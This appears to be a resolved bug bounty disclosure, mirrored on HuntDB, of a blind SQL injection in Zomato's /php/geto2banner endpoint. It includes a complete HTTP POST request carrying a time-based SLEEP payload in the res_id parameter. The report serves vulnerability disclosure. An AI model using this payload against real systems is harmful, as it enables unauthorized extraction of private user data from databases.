Loading HuntDB...

[www.zomato.com] Blind SQL Injection in /php/geto2banner

Critical
Z
Zomato
Submitted None
Reported by zzzhacker13

Vulnerability Details

Technical details and impact analysis

SQL Injection
## Hi Team! Our team discovered a ``Blind SQL Injection`` by Abusing LocalParams (`res_id`) in `/php/geto2banner` **We are working to create a full PDF Report as an WriteUp ;)** ## Here is a Temporal Exploit based on the Vulnerable request: ``` POST /php/geto2banner HTTP/1.1 Host: www.zomato.com Connection: close Content-Length: 73 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36 Content-type: application/x-www-form-urlencoded Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en res_id=51-CASE/**/WHEN(LENGTH(version())=10)THEN(SLEEP(6*1))END&city_id=0 ``` Thank you so much!! - As you can see in the request - we are able to **Exploit** it to **extract data from your DB**! ## Impact ## Full database access holding private user information.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$2000.00

Submitted

Weakness

SQL Injection